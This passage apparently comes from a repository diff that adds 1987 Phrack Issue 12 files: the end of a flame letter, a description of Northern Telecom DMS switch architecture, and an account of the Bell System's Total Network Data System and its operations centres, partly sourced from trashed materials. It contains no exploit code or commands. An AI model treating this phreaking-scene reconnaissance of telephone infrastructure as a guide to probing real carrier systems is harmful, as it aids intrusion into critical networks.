all the rumors about you to be false or misrepresentation. When PLP dissolved,
|
||||
he saw no purpose to be in any longer and dropped out. You proceeded to rag
|
||||
on him, when you know you aren't half the man he is. You don't even possess
|
||||
half the knowledge or personality he has. Tell me, what gives you such
|
||||
authority to rag on people? What makes you so supreme? Why are you so rich,
|
||||
when you are 18 and don't even have a car, when you go on and on about your
|
||||
parents?
|
||||
|
||||
You rag on Atlantis because you were kicked off. Now you tell people how lame
|
||||
it is and how stupid The Lineman and Sir William are. When you know that they
|
||||
were sick of your, "I am supreme attitude," of your childish antics and your
|
||||
lack of knowledge of any kind.
|
||||
|
||||
Well, Exy, rag on me now, tell me how lame I am, insult me. Make your poems,
|
||||
songs, and raps. Tell me what kind of a loser I am. Insult Solid State, show
|
||||
us just how childish you can be. Until then, go back into your dream world
|
||||
and leave us alone.
|
||||
|
||||
Oryan QUEST
|
422
phrack12/4.txt
Normal file
422
phrack12/4.txt
Normal file
|
@ -0,0 +1,422 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue 12, Phile #4 of 11
|
||||
|
||||
<%><%><%><%><%><P><h><a><n><t><a><s><i><e><%><%><%><%><%>
|
||||
<S> A Tribunal Communications Ltd. (c) 1987 <S>
|
||||
<h> <p>
|
||||
<a>Understanding the Digital Multiplexing System (DMS)<a>
|
||||
<d> Part 1 <w>
|
||||
<o> By Control C <n>
|
||||
<w><%><%><%><%><%><R><e><a><l><m><%><%><%><%><%><%><%><!>
|
||||
|
||||
|
||||
|
||||
|
||||
The DMS switching system, is a lot smaller than normal systems. It takes up
|
||||
less than 16% of the space for the same number of Step-By-Step (SXS) lines and
|
||||
20% of cross bar. This is done by taking the hardware out of the CO and
|
||||
putting them closer to a group of subscribers. Then central office services
|
||||
can be provided over shorter loops.
|
||||
|
||||
DMS offers remote switching with a bunch of remote modules in a bunch of
|
||||
sizes and capabilities. Some include SXS replacement or growth, Outside plant
|
||||
cable relief, and Office feature's. The use of remote modules give the CO
|
||||
more floor space that would usually be used by the Line Concentrating Modules
|
||||
(LCMs), Main Distribution Frame (MDF), and cable equipment. The advantage of
|
||||
these modules is that it extends the service radius of the CO, this means
|
||||
outside plant savings. Remote modules can be located up to 150 miles away
|
||||
without messing up transmissions.
|
||||
|
||||
Other advantages of the DMS system are that it allows integration between
|
||||
Transmission facilities and switching systems. It's hardware & software is
|
||||
designed to give a full range of switching applications for Private Branch
|
||||
Exchange (PBX) business systems, local, toll, and local/toll requirements. The
|
||||
same Central Control Complex (CCC) and switching networks are used throughout
|
||||
the whole system. The only difference between each system is the peripheral
|
||||
units, and software packages. It has a Maintenance and Administration Position
|
||||
(MAP) which is a integrated multifunction machine interface that switch
|
||||
maintenance, line and trunk network management, and service order changes can
|
||||
be carried out.
|
||||
|
||||
The software for the central processor is written in PROTEL, a high level
|
||||
pascal based language. Peripheral processors use a XMS-Pascal software
|
||||
language.
|
||||
|
||||
DMS has a high line and trunk capacity. It has up to 100,000 lines on a
|
||||
DMS-100 or 60,000 trunks on a DMS-200. It also gives up to 1.4 million
|
||||
two-way CCS through the switching network. The processor can accept up to
|
||||
350,000 call attempts.
|
||||
|
||||
Here's a list of the DMS systems in use today:
|
||||
|
||||
DMS-100 - is a class 5 local office with the ability to handle 1,000 to
|
||||
100,000 lines. It can give basic telephone service or expanded to handle IBN
|
||||
custom calling features. The DMS-100 MTX gives cellular radio services. A
|
||||
local office can also be adapted to Equal Access End Office (EAEO).
|
||||
|
||||
Remote Switching Center (RSC) - Ability to handle up to 5,760 lines.
|
||||
|
||||
Remote Line Concentrating Module (RLCM) - Ability to handle up to 640 lines.
|
||||
It uses host Line Concentrator Module (LCM) that can be used by the RSC or
|
||||
directly by the host DMS-100.
|
||||
|
||||
Outside Plant Module (OPM) - Ability to handle up to 640 lines. This also can
|
||||
be used by the RSC or directly by the host DMS-100.
|
||||
|
||||
Subscriber Carrier Module (SCM-100) - There are three basic types of
|
||||
SCM-100's:
|
||||
1- Subscriber Carrier Module Rural (SCM-100R) - This eliminates the central
|
||||
office Central Control Terminal (CCT) by integrating directly into the
|
||||
DMS-100 through the DMS-1 span lines.
|
||||
2- Subscriber Carrier Module SLC-96 (SCM-100S) - This gives a direct
|
||||
interface between DMS-100 and AT&T's SLC-96 digital loop carrier
|
||||
systems.
|
||||
3- Subscriber Carrier Module Urban (SCM-100U) - It's used as an interface
|
||||
to the DMS-1 Urban. The DMS-1 urban is a digital subscriber carrier
|
||||
system modified for use in Urban areas. It gives Plan Ordinary
|
||||
Telephone Service (POTS) and special services between a central office
|
||||
and residential and business communities. It has the ability to handle
|
||||
576 lines of POTS and special services.
|
||||
|
||||
DMS-200 - Has the ability to handle from a few hundred to 60,000 trunks. This
|
||||
switch can also serve a Access Tandem (AT) function. The Traffic Operator
|
||||
Position System (TOPS) puts operator services into the DMS-200. Operator
|
||||
Centralization (OC) allows a single operator location by using the TOPS
|
||||
positions to transfer operator services from other DMS-200 toll centers. The
|
||||
Auxiliary Operator Services System (AOSS) let operator services on calls that
|
||||
need outside information (Such as Directory assistance).
|
||||
|
||||
DMS-100/200 - Allows local and toll features described above but also includes
|
||||
a Equal Access End Office (EAEO)/Access Tandem (AT) combination. It has the
|
||||
ability to handle up to 100,000 lines or 60,000 trunks.
|
||||
|
||||
DMS-250 - This is a high capacity toll system for specialized common carriers
|
||||
needing tandem switching operations.
|
||||
|
||||
DMS-300 - This is a toll system designed for international use. To my
|
||||
knowledge there are only two DMS-300 switches in use at this time.
|
||||
|
||||
DMS switches are divided into four "Functional" areas designed to do certain
|
||||
operations. These areas are:
|
||||
|
||||
1- Central Control Complex (CCC)
|
||||
2- Network (NET)
|
||||
3- Peripheral Modules (PM)
|
||||
4- Maintenance and Administration (MAP)
|
||||
|
||||
|
||||
Here's a description of those areas.
|
||||
|
||||
Central Control Complex
|
||||
|
||||
Within the Central Control Complex (CCC), the main program in the switch
|
||||
controls the processing of calls, maintenance and administrative routines, and
|
||||
changes the activity for these routines to other areas of the switch. The CCC
|
||||
sends messages to the network, the maintenance and administrative areas trough
|
||||
message links and directs the functions to be run in those areas.
|
||||
|
||||
Network
|
||||
|
||||
The Network Modules (NMs) handle the routing of speech paths between the
|
||||
Peripheral Modules (PMs) and keep these speech connections for the rest of the
|
||||
call. The network handles message and speech links between the PMs and the
|
||||
CCC.
|
||||
|
||||
Maintenance and Administration
|
||||
|
||||
Within the Maintenance and Administration includes Input/Output Controllers
|
||||
(IOCs) - IOCs interface local or remote input/output devices. The I/O devices
|
||||
are used to do testing, maintenance, or administrative functions for the
|
||||
system.
|
||||
|
||||
Peripheral Modules
|
||||
|
||||
Peripheral Modules (PMs) are used as interfaces between digital carrier spans
|
||||
(DS-1), analog trunks, and subscriber lines. The PMs are used for scanning
|
||||
lines for changes of circuit state, doing timing functions used for call
|
||||
processing, creating dial tones, sending, receiving signaling, and controlling
|
||||
information to and from the CCC, and checking the network.
|
||||
|
||||
Before 1984 only four types of PMs gave trunk interfaces to the DMS system;
|
||||
these include Trunk Modules (TMs), Digital Carrier Modules (DCMs), Line
|
||||
Modules (LMs), and Remote Line Modules (RLMs). Since then ten more have been
|
||||
added, these include Digital Trunk Controller (DTC), Line Group Controller
|
||||
(LGC), Line Trunk Controller (LTC), Line Concentrating Module (LCM), Remote
|
||||
Switching Center (RSC), Remote Line Concentrating Module (RLCM), Outside Plant
|
||||
Module (OPM), Subscriber Carrier Module Rural (SCM-100R), Subscriber Carrier
|
||||
Module SLC-96 (SCM-100S), and Subscriber Carrier Module Urban (SCM-100U).
|
||||
|
||||
Here's and explanation of those modules:
|
||||
|
||||
Trunk Module
|
||||
|
||||
The Trunk Module (TM) changes incoming speech into digital format, it has the
|
||||
ability to handle 30 analog trunks. The Pulse Code Modulation (PCM)
|
||||
information is combined with the trunks supervisory and control signals then
|
||||
transmitted at 2.56 Mb/s over speech links to the network.
|
||||
|
||||
The TM also uses service circuits such as Multifrequency (MF) receivers,
|
||||
announcement trunks, and test circuits. Each TM has the ability to interface
|
||||
30 analog trunks or service circuits to the network over one 32-channel speech
|
||||
link. The TM is not traffic sensitive so each trunk can carry 36 CCS.
|
||||
|
||||
Digital Carrier Module
|
||||
|
||||
The Digital Carrier Module (DCM) gives a digital interface between the DMS
|
||||
switch and the DS-1 digital carrier. The DS-1 signal consists of 24 voice
|
||||
channels. The DCM takes out and puts in signaling and control information on
|
||||
the DS-1 bit streams which then makes them DS-30 32-channel speech links. The
|
||||
DCM can interface five DS-1 lines; 5*24=120 voice channels; into four 32-
|
||||
channel speech links. The DCM can carry a maximum of 36 CCS of traffic on
|
||||
each trunk.
|
||||
|
||||
Line Module
|
||||
|
||||
The Line Module (LM) gives an interface for a maximum of 640 analog lines and
|
||||
condenses the voice and signaling into two, three, or four DS-30, 32-channel
|
||||
speech links. Four speech links have the ability to handle 3,700 Average Busy
|
||||
Season Busy Hour (ABSBH) CCS per LM.
|
||||
|
||||
Remote Line Module
|
||||
|
||||
The Remote Line Module (RLM) is a LM operating in a remote location from the
|
||||
DMS host. The RLMs can be located up to 150 miles from the host office,
|
||||
depending on the transmission facilities.
|
||||
|
||||
Digital Trunk Controller
|
||||
|
||||
The Digital Trunk Controller (DTC) has the ability to interface 20 DS-1 lines.
|
||||
Then the DS-1 lines are linked to the network by a maximum of 16 DS-30 speech
|
||||
links; each trunk is able to handle 36 CCS.
|
||||
|
||||
Line Group Controller
|
||||
|
||||
The Line Group Controller (LGC) dose medium level processing tasks, with the
|
||||
ability to use host and remote subscriber line interfaces. The LGC has the
|
||||
ability to use Line Concentrating Modules (LCMs), Remote Switching Centers
|
||||
(RSCs), Remote Line Concentrating Modules (RLCMs), and Outside Plant Modules
|
||||
(OPMs).
|
||||
|
||||
The LGC can interface up to 20 DS-30 speech links from the LCMs or up to 20
|
||||
DS-1 links with the ability to serve RSCs, RLCMs, or OPMs.
|
||||
|
||||
Line Trunk Controller
|
||||
|
||||
The Line Trunk Controller (LTC) combines the DTC and LGC functions and gives a
|
||||
way to use all the equipment inside the office. The LTC has the ability to
|
||||
handle the LCM, RSC, RLCM, OPM, and digital trunk interfaces.
|
||||
|
||||
The LTC has the ability to give interfaces to a maximum of 20 outside ports
|
||||
from DS-30A speech links or DS-1 links to 16 network side DS-30 speech links.
|
||||
|
||||
Line Concentrating Module
|
||||
|
||||
The Line Concentration Module (LCM) when used with the LGC or LTC is just an
|
||||
expanded version of the line Module. It can serve up to 640 subscriber lines
|
||||
interfaced with two to six DS-30A speech links. Using six speech links 5,390
|
||||
CCS can be handled per LCM.
|
||||
|
||||
Remote Switching Center
|
||||
|
||||
The Remote Switching Center (RSC) interfaces subscriber lines at a remote
|
||||
location to a DMS-100 host. It has the ability to handle interface for 5,760
|
||||
lines and is used a replacements for dial offices or Private Branch Exchanges
|
||||
(PBXs). It can handle 16,200 CCS with the use of 16 DS-1 links.
|
||||
|
||||
The RSC consists of the following:
|
||||
|
||||
Line Concentrator Module (LCM) - These modules do line interface function.
|
||||
They are the same as the LCMs that are used in the DMS-100 host.
|
||||
|
||||
Remote Cluster Controller (RCC) - This controller gives DS-1/LCM interface,
|
||||
Local switching inside the remote, and Local intelligence and signaling when
|
||||
in ESA.
|
||||
|
||||
Remote Trunking - Handles the use of RSC originating or terminating traffic
|
||||
for digital trunking off the RSC. It can give trunking to a CDO co-located
|
||||
with the RSC or within the service range of the RSC, Private Automatic Branch
|
||||
Exchanges (PABXs), or Direct Inward Dialing (DID) trunks.
|
||||
|
||||
Remote-off-Remote - Lets the RLCMs and OPMs connect to the RCC through DS-1
|
||||
interfaces. It lets RLCM and OPM subscribers to use the same lines to the host
|
||||
as the RSC subscribers.
|
||||
|
||||
Emergency Stand-Alone (ESA) - If communication with the DMS-100 is lost this
|
||||
will allow you to call internal to the RSC. It will give station-to-station
|
||||
and station-to-trunk calls for POTS, IBN, and electronic business sets.
|
||||
|
||||
Remote Line Concentrating Module
|
||||
|
||||
The Remote Line Concentrating Module (RLCM) is just a LCM used is a remote
|
||||
location from the DMS-100 host. The RLCM can handle 640 lines; this can is
|
||||
sometimes used as a replacement for CDOs or PBXs.
|
||||
|
||||
Outside Plant Module
|
||||
|
||||
The Outside Plant Module (OPM) is an outside plant remote unit. The OPM can
|
||||
handle 640 lines over six DS-1 links.
|
||||
|
||||
Subscriber Carrier Module
|
||||
|
||||
The Subscriber Carrier Module (SCM) gives a direct interface for remote
|
||||
concentrators.
|
||||
|
||||
SCM-100R - It can interface up to five Northern Telecom DMS-1 Rural Remote
|
||||
Terminals (RTs). A DMS-1 rural remote terminal can interface up to 256 lines.
|
||||
Communication between the RT and SCM- 100R is done through one or two span
|
||||
lines for voice and one protection line.
|
||||
|
||||
SCM-100U - It can interface up to three DMS-1 Urban RTs. A DMS-1 Urban can
|
||||
interface up to 576 POTS or special service lines. Communication from the RT
|
||||
to the SCM-100U us done through a maximum of eight DS-1 links.
|
||||
|
||||
SCM-100S - It can interface up to four Mode I (non-concentrated) SLC-96
|
||||
systems or up to six Mode II (concentrated) systems. A SLC-96 can give
|
||||
interface for up to 96 lines.
|
||||
|
||||
The SCM-100 takes away the need for central concentrating terminals and analog
|
||||
line circuits at the host.
|
||||
|
||||
Operator Features
|
||||
|
||||
With the use of DMS-200 or DMS 100/200 switch, operator features are available
|
||||
by the following:
|
||||
|
||||
Traffic Operator Position System (TOPS)
|
||||
Operator Centralization (OC)
|
||||
Auxiliary Operator Service System (AOSS)
|
||||
|
||||
Traffic Operator Position System (TOPS) gives many operator function on inward
|
||||
and outward calls. The TOPS integrates the operator system with the DMS-200
|
||||
or DMS-100/200 toll switch.
|
||||
|
||||
One voice and one data circuit are needed for each operator position. The
|
||||
voice circuit is connected to a port of a three-port conference circuit. The
|
||||
other two ports are connected to the calling and called parties. The data
|
||||
circuit is used for a digital modem and is used to transmit data punched in by
|
||||
the operator to the CCC for processing.
|
||||
|
||||
Operator Centralization
|
||||
|
||||
Operator Centralization (OC) lets the operator use the services given by the
|
||||
DMS-200 or DMS-100/200 with TOPS. With OC operator traffic from surrounding
|
||||
DMS sites can be routed to a central host site.
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
Operator Centralization Diagram
|
||||
|
||||
|
||||
|
||||
Routing - - -
|
||||
<-----\ DMS-200 | AMA |
|
||||
\ Remote TC / - - -
|
||||
= = = = = = = /
|
||||
| \ ----- ___|_/
|
||||
| \: DMS : |
|
||||
| : 200 : | Host TC -----
|
||||
| : : | = = = = = = = = /| POS |
|
||||
| : (OC:___| | --------- | / |- - -|
|
||||
| : : |\ | : DMS-200 : | / |Oper.|
|
||||
| -----\ | \ | : (TOPS) :__|_/ -----
|
||||
= = = = = = = \____________|__: : |
|
||||
Trib Ope Traffic->\ ____________|__:OC) : |
|
||||
\ / | : : |
|
||||
Non-DMS Remote TC / | --------- |
|
||||
= = = = = = = = = = = = = = = = = = =
|
||||
| -------- ----- |
|
||||
| : TDM : : (OC: |
|
||||
| : Switch : : : | -----
|
||||
| : : : DMS :_|_____: AMA :
|
||||
| : : : 200 : | -----
|
||||
| /-------- -----\ |
|
||||
= = = = = = = = = = =
|
||||
/Routing \ <-Trib Opr Traffic
|
||||
\-------> \
|
||||
|
||||
|
||||
|
||||
Auxiliary Operator Services System
|
||||
|
||||
The Auxiliary Operator Services System (AOSS) is made to handle directory
|
||||
assistance, intercept, and that type of operator services, automatic call
|
||||
distribution, call processing, call detail recording, and operator
|
||||
administration functions for other operator services that do not need call
|
||||
completion to a called party. AOSS position uses the same hardware as the
|
||||
TOPS links to the switch.
|
||||
|
||||
Equal Access
|
||||
|
||||
Equal Access (EA) is accessible through DMS switches with the addition of
|
||||
software packages. Both Equal Access End Office (EAEO) for the DMS-100 and
|
||||
Access Tandem (AT) for the DMS-200 provide equal access features.
|
||||
|
||||
|
||||
|
||||
|
||||
Equal Access Network Application
|
||||
|
||||
|
||||
|
||||
|
||||
--------- __________________________________
|
||||
(Phone)--------| DMS-100 |___________ |
|
||||
--------- | |
|
||||
NON-EAEO | |IC/INC
|
||||
-------- -------- /---------\ TO
|
||||
(Phone)---| |------------| DMS-200 |------------ ---- IC/INC
|
||||
-------- --------- \---------/ /----->
|
||||
| |
|
||||
--------- ___________| |
|
||||
(Phone)--------| DMS-100 |__________________________________|
|
||||
---------
|
||||
|
||||
|
||||
|
||||
DMS-100 EAEO
|
||||
|
||||
The DMS-100 EAEO gives direct access to interLATA (Local Access and Transport
|
||||
Area) carriers Point of Presence (POP) inside the LATA. The DMS-200 AT gives
|
||||
a traffic concentration and distribution function for interLATA traffic
|
||||
originating or terminating inside a LATA. It allows the following:
|
||||
|
||||
10XXX and 950-1XXX dialing
|
||||
presubscription dialing
|
||||
equal access and normal network control signaling
|
||||
Automatic Number Identification (ANI) on all calls
|
||||
custom calling services
|
||||
|
||||
Common Channel Interoffice Signaling
|
||||
|
||||
Common Channel Interoffice Signaling (CCIS) uses a separate data link to
|
||||
transmit signaling messages between offices for many trunks and trunk groups.
|
||||
There are two types of CCIS available in the DMS-200 or DMS-100/200, Banded
|
||||
Signaling (CCIS-BS) and Direct Signaling (CCIS-DS).
|
||||
|
||||
CCIS-BS is for interoffice trunk signaling to give information on digits
|
||||
dialed, trunk identity, and other class and routing information. This kind of
|
||||
trunk signaling takes less time to setup calls and put's an end to Blue
|
||||
Boxing.
|
||||
|
||||
CCIS-DS is used to transfer call handling information past what is required
|
||||
for trunk setup. This type of signaling lets calling card validation,
|
||||
mechanized calling card services and billed number screening to be used.
|
||||
|
||||
Cellular Mobile Radio Service
|
||||
|
||||
Cellular Mobile Radio Service is possible with the DMS-100 Mobile Telephone
|
||||
Exchange (MTX). The MTX has the ability to serve from a few hundred to over
|
||||
50,000 people in up to 50 cells.
|
||||
|
||||
Thanks to Northern Telecom and my local CO.
|
||||
|
||||
Control C
|
||||
ToK!
|
||||
|
||||
March 1987
|
||||
End of Part 1
|
||||
<%><%><%><%><%>
|
||||
|
252
phrack12/5.txt
Normal file
252
phrack12/5.txt
Normal file
|
@ -0,0 +1,252 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue 12, Phile #5 of 11
|
||||
|
||||
THE TOTAL NETWORK DATA SYSTEM
|
||||
|
||||
|
||||
BY DOOM PROPHET
|
||||
|
||||
|
||||
|
||||
|
||||
The Total Network Data System is a monitoring/analysis network used by
|
||||
several offices within the Telco to analyze various levels of switching
|
||||
systems in relation to maintenance, performance, and future network planning
|
||||
purposes. The systems and the offices that use them will be described in
|
||||
detail in the following text.
|
||||
|
||||
|
||||
All switching entities that are in one particular serving area collect
|
||||
traffic information that is classified in three ways: peg count, overflow, and
|
||||
usage. Peg count is a count of all calls offered on a trunk group or other
|
||||
network component during the measurement interval, which is usually one hour.
|
||||
It includes calls that are blocked, which is classified as overflow traffic.
|
||||
The other measurement types that the TNDS network analyzes and collects are as
|
||||
follows:
|
||||
|
||||
Maintenance Usage (for 1ESS, 2ESS, 5XB, 1XB, XBT)
|
||||
|
||||
Incoming Usage (for 1E, 2E, 4AETS)
|
||||
|
||||
All trunks busy (SxS)
|
||||
|
||||
Last Trunks Busy (SxS)
|
||||
|
||||
Completions (SxS, 5XB, XBT, 1XB)
|
||||
|
||||
Incoming Peg Count (DMS)
|
||||
|
||||
Maintenance Busy Count (2E, 3E)
|
||||
|
||||
Detector Group Usage (SxS, 5XB, XBT, 1XB)
|
||||
|
||||
In ESS and DMS offices, traffic data is collected by the central processor of
|
||||
the switch. In electomechanical offices such as crossbar, a Traffic Usage
|
||||
Recorder is used to scan trunks and other components about every 100 seconds,
|
||||
counting how many are in use. This data when compiled is sent to the EADAS
|
||||
system, which is located in the Operating Company's Network Data Collection
|
||||
Centers and runs on a minicomputer. 4ESS and 4Xbar toll offices do not use
|
||||
EADAS, but their own system called the Peripheral Bus Computer for traffic
|
||||
data analysis. After receiving the traffic data from up to 80 switching
|
||||
offices, EADAS performs two basic functions: It processes some data in near
|
||||
real time (shortly after it is received) to provide hourly and half hourly
|
||||
reports and a short term database for network administrators. It also collects
|
||||
and summarizes data that it will pass on to the other TNDS systems via data
|
||||
links or magnetic tape.
|
||||
|
||||
Three other systems receive directly from EADAS. These systems are ICAN,
|
||||
TDAS, and EADAS/NM. ICAN stands for Individual Circuit Analysis plan and is
|
||||
used to study individual circuits in central office equipment that have been
|
||||
specified by network administrators.
|
||||
|
||||
TDAS is the Traffic Data Administration System, which formats traffic data
|
||||
for use by the remaining downstream systems. ICAN and EADAS/NM are the only
|
||||
two systems with data links to EADAS that don't have their data formatted by
|
||||
TDAS before reception. TDAS is run on a mainframe in the NDCC and can be
|
||||
thought of as a distribution facility for the traffic data. EADAS/NM is used
|
||||
to watch switching systems and trunk groups designated by network managers,
|
||||
and reports existing or anticipated congestion on a display board at the
|
||||
Network Management Centers, where the system is located. Problems can be
|
||||
analyzed with this system and dealt with within a short period of time after
|
||||
they occur.
|
||||
|
||||
Central Office Reporting Systems
|
||||
--------------------------------
|
||||
|
||||
There are five TNDS engineering and administrative systems that provide
|
||||
operating company personnel with reports about CO switching equipment. These
|
||||
are the LBS, 5XBCOER, SPCSCOER, ICAN, and SONDS. LBS, the Load Balance System,
|
||||
helps assure that the customer traffic load is uniformly distributed over each
|
||||
switching system. It minimizes congestion on the concentrators, which allow
|
||||
subscribers to share the equipment in the switch. The LBS analyzes traffic
|
||||
data coming to it from TDAS to determine the traffic load on each line group
|
||||
that the system serves. LBS generates reports used by the NMC to determine
|
||||
line groups that can have new incoming subscriber lines assigned to them. LBS
|
||||
also does a load balance indexes for the entire operating company, indicating
|
||||
how effectively each CO has avoided congestion.
|
||||
|
||||
Crossbar #5 Central Office Equipment Reports (5XBCOER) and Stored Program
|
||||
Control Systems COER used for 1, 2, and 3 ESS offices, analyze traffic data to
|
||||
indicate the overall service provided by the switching system and to tell how
|
||||
much of its capacity is being used. This info helps determine if new equipment
|
||||
is needed.
|
||||
|
||||
ICAN, which was described briefly above, detects switching system
|
||||
equipment faults by identifying abnormal load patterns on individual circuits.
|
||||
A series of reports printed at the Network Administration Center helps network
|
||||
administrators analyze individual circuit usage and verify circuit grouping.
|
||||
ICAN is located at the BOC main computer center along with 5XBCOER.
|
||||
|
||||
The fifth CO equipment reporting system is called the Small Office Network
|
||||
Data System, or SONDS. SONDS performs a full range of data manipulation
|
||||
functions, and is used to provide economically the full TNDS features for step
|
||||
by step offices. Step offices send data directly to this system, and it is not
|
||||
formatted by EADAS or TDAS, as it doesn't go through these systems. Weekly,
|
||||
monthly, exception and on demand reports are automatically distributed by
|
||||
SONDS to the NAC personnel.
|
||||
|
||||
|
||||
Trunk Network Reporting Systems
|
||||
-------------------------------
|
||||
|
||||
These systems are parts of the TNDS used by the Circuit Administration
|
||||
Center to support trunk servicing and forecasting. The Trunk Servicing System
|
||||
helps trunk administrators develop short term plans to make the best use of
|
||||
the trunks that are already in use. It receives and processes data received
|
||||
from TDAS and computes offered load. Offered load is the amount of traffic a
|
||||
trunk group would have carried had the number of circuits been large enough to
|
||||
handle the load without trunk blocking (giving the caller a re-order or all
|
||||
circuits busy recording). TSS produces weekly reports showing underutilization
|
||||
of trunks and below grade of service trunk groups which do not have enough
|
||||
trunks in them. The CAC uses these reports to add or disconnect trunks
|
||||
according to what traffic requirements exist.
|
||||
|
||||
The Traffic Routing and Forecasting System, replacing the Trunk
|
||||
Forecasting System, forecasts message trunk requirements for the next five
|
||||
years. Major conversions and similar network changes are all taken into
|
||||
consideration when determining the future traffic needs. TRFS receives data
|
||||
from EADAS, TDAS, and TSS and is located at the Operating Company computer
|
||||
center.
|
||||
|
||||
|
||||
Since TDAS and some of the downstream TNDS systems need much of the same
|
||||
information, that information is maintained in a system called Common Update.
|
||||
In this manner, some data does not have to be duplicated in each individual
|
||||
system. Some of the information includes the configuration of switching
|
||||
equipment and the trunk network and specifications on traffic registers for
|
||||
central offices. Numbers recorded by each register are treated consistently by
|
||||
each system that uses the Common Update data base. There is an update base for
|
||||
trunking, referred to as CU/TK, and an update on equipment known as CU/EQ. The
|
||||
trunking part of the Operating Company's data base is coordinated by the Trunk
|
||||
Records Management System.
|
||||
|
||||
Since the TNDS systems are so important to the proper operation of the
|
||||
network, the CSAR (Centralized System For Analysis and Reporting) is used to
|
||||
monitor the entire TNDS performance. The NDCC, the NAC, and the CAC are
|
||||
provided with measurements of the accuracy, timeliness, and completeness of
|
||||
the data flow through TNDS from beginning to end. It doesn't analyze data from
|
||||
EADAS/NM, SONDS, or TRFS.
|
||||
|
||||
|
||||
|
||||
|
||||
BOC Operations Centers
|
||||
----------------------
|
||||
|
||||
NAC-Network Administration Center. Responsible for optimum loading, and
|
||||
utilization of installed COE. Performs daily surveillance of COs and trunk
|
||||
groups to ensure service objectives are being met. The NAC Reviews profiles of
|
||||
office load relating to anticipated growth. They work with NSEC to initiate
|
||||
work orders to increase equipment in use. The systems they use are EADAS,
|
||||
SPCSCOER, CSAR, and SONDS.
|
||||
|
||||
NMC-Network Management Centers. The NMC keeps the network operating
|
||||
efficiently when unusual traffic patterns or equipment failures would
|
||||
otherwise result in congestion. The NMC analyzes network performance and
|
||||
prepares contingency plans for peak days, telethons, and major switch
|
||||
failures. They monitor a near real time network performance data to identify
|
||||
abnormal situations. The system they use is EADAS/NM.
|
||||
|
||||
CAC-Circuit Administration Center. The CAC ensures that in service trunks
|
||||
meet current as well as anticipated customer demands at acceptable levels of
|
||||
service. For planned servicing, the CAC compares current traffic loads with
|
||||
forecasted loads for the upcoming busy season. If the loads are consistent,
|
||||
the CAC issues the orders to provide the forecasted trunks. When
|
||||
inconsistencies occur, they examine the variation, develop modified forecasts,
|
||||
and issue orders based on the new forecast. They review weekly traffic data to
|
||||
identify trunk groups that need additions and issue the necessary trunk
|
||||
orders. The systems they use are TSS, TRFS, and CSAR.
|
||||
|
||||
NSEC-Network Switching Engineering Center. They plan and design the
|
||||
network along with the CAC. NSEC develops a forecast of loads for traffic
|
||||
sensitive switching equipment, sets office capacities, and determines relief
|
||||
size and timing.
|
||||
|
||||
|
||||
For long range planning, the following offices are utilized.
|
||||
|
||||
TNPC-Traffic Network Planning Center. The TNPC determines the most
|
||||
economic growth and replacement strategies. They handle future network
|
||||
considerations over a 20 year period for tandem systems, operator services
|
||||
networks, interconnecting trunks, and switching terminations to accommodate
|
||||
the trunks.
|
||||
|
||||
WCPC-Wire Center Planning Center. This office does the same as the TNPC,
|
||||
but their jurisdiction includes local switches, the subscriber network, and
|
||||
interoffice facilities. They have the numbers, types, and locations of
|
||||
switches and homing arrangements. They also keep track of alternate routes,
|
||||
tandem centers, etc. Both the TNPC and WCPC provide the CAC and NSEC with
|
||||
office and network evolution plans for 20 years.
|
||||
|
||||
|
||||
District based maintenance and administration operations are handled by
|
||||
the NAC, RCMAC, and the SCC. These can cover 240 square miles of serving area.
|
||||
|
||||
|
||||
Network Operations Centers
|
||||
--------------------------
|
||||
|
||||
The highest level of network operations is the Network Operations Center,
|
||||
located in the AT&T Long Lines HQ in Bedminster, NJ. The main computers used
|
||||
by the NOC are in Netcong, about 25 miles away, along with some backups. The
|
||||
NOC are responsible for interregional coordination between the 12 RNOCs, 27
|
||||
NMCs, and 2 RNMCs in Canada; for monitoring the top portion of toll switches
|
||||
(all class 1 Regional Centers, 2 Canadian, about 70 class 2 Sectional Centers,
|
||||
200 Primary centers, some class 4 Toll centers); for monitoring of the
|
||||
international gateways, and the CCIS network for these switching systems. The
|
||||
STP signalling links connect STPs to each other, to switches, and to a
|
||||
centralized database called an NCP (Network Control Point) of which access is
|
||||
given to switches directly via CCIS.
|
||||
|
||||
The Data Transfer Point, which is a data switch that furnishes the NOC with a
|
||||
flow of monitoring information for all key toll switches, also gives them
|
||||
information about CCIS STPs and the IOCCs that they monitor.
|
||||
|
||||
The operating system supporting the NOC is the NOCS (the S being System),
|
||||
which is configured with the DTP, a wall display processor, graphics
|
||||
processors, receive only printers, and CRT terminals for the technicians. The
|
||||
NOC also uses EADAS/NM through the DTP. Both the NOCS and the DTP run Unix
|
||||
operating systems.
|
||||
|
||||
|
||||
The second highest level of these operations centers are the RNOCs, or
|
||||
Regional Network Operations Centers. The 12 RNOCs monitor the CCIS network and
|
||||
coordinate the 2-3 NMC's activities for its region. The RNOCs use the EADAS/NM
|
||||
system and something called NORGEN, Network Operations Report Generator, that
|
||||
prints out reports from EADAS's traffic data.
|
||||
|
||||
The first or lowest level of these centers is the Network Management
|
||||
Centers. There were 27 EADAS/NM supported NMCs across the United States as of
|
||||
1983. The NMC was described above, as well as the systems it used.
|
||||
|
||||
|
||||
==============================================================================
|
||||
|
||||
Some of this information was taken from Bell System publications and from
|
||||
trashed materials, and may not be the same for every area. All material is
|
||||
correct to the best of the author's knowledge. Thanks to The Marauder for
|
||||
supplying some information. This file was written for educational purposes
|
||||
only.
|
||||
|
||||
-End Of File-
|
157
phrack12/6.txt
Normal file
157
phrack12/6.txt
Normal file
|
@ -0,0 +1,157 @@
|
|||
Written March, 1987
|
||||
|
||||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue 12, Phile #6 of 11
|
||||
|
||||
/\ /\
|
||||
<[]>==========================================<[]>
|
||||
\/ ^ ^ \/
|
||||
|| PLP [+]The Executioner[+] PLP ||
|
||||
++ ^ ^ ++
|
||||
|| [+] PhoneLine Phantoms! [+] ||
|
||||
++ ++
|
||||
|| CSDC - Hardware Requirements ||
|
||||
++ ----------------------------- ++
|
||||
|| PLP | PHRACK XII - PHRACK XII | PLP ||
|
||||
/\ ----------------------------- /\
|
||||
<[]>==========================================<[]>
|
||||
\/ Phreak Klass Room 2600 = 806-799-0016 \/
|
||||
|| _______________ Login: Educate ||
|
||||
++ |The only BBS | Sysop:Egyptian Lover ++
|
||||
|| |that teaches.| Cosysop:The Executioner||
|
||||
